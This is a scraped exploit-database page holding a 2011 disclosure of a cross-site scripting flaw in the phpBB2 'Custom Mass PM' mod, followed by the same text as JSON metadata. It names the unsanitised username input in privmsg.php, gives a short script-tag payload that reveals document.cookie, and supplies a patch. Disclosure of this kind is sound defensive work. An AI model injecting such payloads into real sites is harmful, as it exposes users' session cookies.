Search...

PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability

2011-08-27T00:00:00

ID 1337DAY-ID-16769
Type zdt
Reporter Silic0n
Modified 2011-08-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            -------------------------------------------------------------------------------
0                             | |              | |                      | |  TM
1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_
0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1   / / (_) | | | |  __/      | | | | (_| | (__|   &lt;  __/ | _| | | |  __/ |_
0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1                         0xPrivate 0xSecurity 0xTeam
0       ++++++++++++++++++++++++++++++++++++++++++++++++++++
1                      A Placec Of 0days  
------------------------------------------------------------------------------

^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability
^ Author     : Silic0n (science_media017[At]yahoo.com)
^ MOD Title: Custom mass PM 
^ MOD Description: Add mass PM functionnality to group members (or all forums members) for   authorized users. Add the   possibility for all users to send ordinary PM to multiple users   (usernames separated by a semi-colon)
^ MOD Version: 1.4.7 
^ Exploit Release: 8/27/2011
^ Vulnearble script: privmsg.php


--------------------
^ Payload
--------------------
0x1 : Goto forum_script/Privmsg.php
0x2 : Username Input Box write Malicious JS eg :&lt;script&gt;alert(document.cookie)&lt;/script&gt;

--------------------
^ Vulnearble code 
--------------------

$to_username_array = explode (";", $HTTP_POST_VARS['username']);

--------------------
Fix :
--------------------

$to_username = phpbb_clean_username($HTTP_POST_VARS['username']);
$to_username_array = explode (";", $to_username);



Special Thnanks To mafi, Gaurav_raj420 ,  Exidous , Mr 52 (7) , Dalsim , Zetra , root4o ,
 D4rk, Danzel, messsy , Thor ,abronsius ,Nova , jaya ,@[email protected] ,entr0py, -[SiLeNtp0is0n]-
,Ne0_Hacker, InX_R00t,DODo(:P)  All ZH , DK & G4H members :)
 
------------
^ Site 
------------
www.igniteds.net (ConsoleFx)



#  0day.today [2018-04-03]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-16769", "type": "zdt", "bulletinFamily": "exploit", "title": "PhpBB2 Module \"Custom Mass PM\" Cross Site Scripting Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2011-08-27T00:00:00", "modified": "2011-08-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/16769", "reporter": "Silic0n", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-03T15:27:11", "viewCount": 4, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/16769", "sourceData": "-------------------------------------------------------------------------------\r\n0 | | | | | | TM\r\n1 _______ _ __ ___ ______| |__ __ _ ___| | _____ _ __ _ __ ___| |_\r\n0 |_ / _ \\| '_ \\ / _ \\______| '_ \\ / _` |/ __| |/ / _ \\ '__| '_ \\ / _ \\ __|\r\n1 / / (_) | | | | __/ | | | | (_| | (__| < __/ | _| | | | __/ |_\r\n0 /___\\___/|_| |_|\\___| |_| |_|\\__,_|\\___|_|\\_\\___|_|(_)_| |_|\\___|\\__|\r\n1 0xPrivate 0xSecurity 0xTeam\r\n0 ++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n1 A Placec Of 0days \r\n------------------------------------------------------------------------------\r\n\r\n^ Exploit title: PhpBB2 Module \"Custom Mass PM\" Cross Site Scripting Vulnerability\r\n^ Author : Silic0n (science_media017[At]yahoo.com)\r\n^ MOD Title: Custom mass PM \r\n^ MOD Description: Add mass PM functionnality to group members (or all forums members) for authorized users. Add the possibility for all users to send ordinary PM to multiple users (usernames separated by a semi-colon)\r\n^ MOD Version: 1.4.7 \r\n^ Exploit Release: 8/27/2011\r\n^ Vulnearble script: privmsg.php\r\n\r\n\r\n--------------------\r\n^ Payload\r\n--------------------\r\n0x1 : Goto forum_script/Privmsg.php\r\n0x2 : Username Input Box write Malicious JS eg :<script>alert(document.cookie)</script>\r\n\r\n--------------------\r\n^ Vulnearble code \r\n--------------------\r\n\r\n$to_username_array = explode (\";\", $HTTP_POST_VARS['username']);\r\n\r\n--------------------\r\nFix :\r\n--------------------\r\n\r\n$to_username = phpbb_clean_username($HTTP_POST_VARS['username']);\r\n$to_username_array = explode (\";\", $to_username);\r\n\r\n\r\n\r\nSpecial Thnanks To mafi, Gaurav_raj420 , Exidous , Mr 52 (7) , Dalsim , Zetra , root4o ,\r\n D4rk, Danzel, messsy , Thor ,abronsius ,Nova , jaya ,@[email\u00a0protected] ,entr0py, -[SiLeNtp0is0n]-\r\n,Ne0_Hacker, InX_R00t,DODo(:P) All ZH , DK & G4H members :)\r\n \r\n------------\r\n^ Site \r\n------------\r\nwww.igniteds.net (ConsoleFx)\r\n\r\n\n\n# 0day.today [2018-04-03] #", "_state": {"dependencies": 1645260990}}